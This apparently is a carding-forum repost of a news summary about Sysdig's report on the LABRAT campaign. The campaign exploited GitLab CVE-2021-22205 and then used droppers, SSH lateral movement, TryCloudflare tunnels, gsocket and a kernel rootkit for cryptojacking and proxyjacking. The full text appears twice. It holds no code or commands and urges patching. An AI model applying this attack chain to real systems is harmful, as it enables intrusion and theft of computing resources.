Carding
Professional
- Messages
- 2,870
- Reaction score
- 2,493
- Points
- 113
Cybercriminals have compromised numerous hosts through a two-year-old security breach.
As Sysdig reported in its report yesterday, the company's specialists recently revealed a new financially motivated operation called LABRAT, in which attackers used a two-year-old critical GitLab vulnerability for cryptojacking and proxyjacking.
"The hackers used signature-based tools, sophisticated and stealthy malware, command and control tools that bypassed firewalls, and kernel-based rootkits to hide their presence," the researchers said.
Proxyjacking allows an attacker to rent a compromised host to a proxy network in order to monetize unused bandwidth. Cryptojacking involves using system resources to mine cryptocurrency.
A distinctive feature of the campaign is the use of compiled Go and .NET binaries to bypass detection systems. LABRAT also functions as a backdoor on infected systems, which can pave the way for subsequent attacks, data theft and ransomware.
The attack begins by exploiting the critical vulnerability CVE-2021-22205 with a CVSS score of 10. As you can see by the ID, it was discovered in 2021 and was soon fixed by GitLab. However, some developers have not yet updated their copies of the software, becoming new victims of hackers.
Successful penetration is accompanied by the receipt of a dropper script from the C2 server. The dropper maintains persistence on the target system, moves sideways using the SSH credentials found there, and downloads additional binaries from a private GitLab repository.
The TryCloudflare service is also an important element of the malicious operation. It is used to establish covert communication channels from compromised hosts.
Some of the payloads used in this campaign include the "gsocket" utility for remote access, as well as binaries for cryptojacking and proxyjacking through the well-known IPRoyal and ProxyLite services. The mining process is hidden using the "hiding-cryptominers-linux-rootkit" kernel rootkit.
Thus, hackers very subtly took advantage of the old GitLab vulnerability to carry out illegal actions for the purpose of financial gain. The company urged users to immediately upgrade their GitLab instances to the latest versions if they haven't already done so for some reason.
As Sysdig reported in its report yesterday, the company's specialists recently revealed a new financially motivated operation called LABRAT, in which attackers used a two-year-old critical GitLab vulnerability for cryptojacking and proxyjacking.
"The hackers used signature-based tools, sophisticated and stealthy malware, command and control tools that bypassed firewalls, and kernel-based rootkits to hide their presence," the researchers said.
Proxyjacking allows an attacker to rent a compromised host to a proxy network in order to monetize unused bandwidth. Cryptojacking involves using system resources to mine cryptocurrency.
A distinctive feature of the campaign is the use of compiled Go and .NET binaries to bypass detection systems. LABRAT also functions as a backdoor on infected systems, which can pave the way for subsequent attacks, data theft and ransomware.
The attack begins by exploiting the critical vulnerability CVE-2021-22205 with a CVSS score of 10. As you can see by the ID, it was discovered in 2021 and was soon fixed by GitLab. However, some developers have not yet updated their copies of the software, becoming new victims of hackers.
Successful penetration is accompanied by the receipt of a dropper script from the C2 server. The dropper maintains persistence on the target system, moves sideways using the SSH credentials found there, and downloads additional binaries from a private GitLab repository.
The TryCloudflare service is also an important element of the malicious operation. It is used to establish covert communication channels from compromised hosts.
Some of the payloads used in this campaign include the "gsocket" utility for remote access, as well as binaries for cryptojacking and proxyjacking through the well-known IPRoyal and ProxyLite services. The mining process is hidden using the "hiding-cryptominers-linux-rootkit" kernel rootkit.
Thus, hackers very subtly took advantage of the old GitLab vulnerability to carry out illegal actions for the purpose of financial gain. The company urged users to immediately upgrade their GitLab instances to the latest versions if they haven't already done so for some reason.
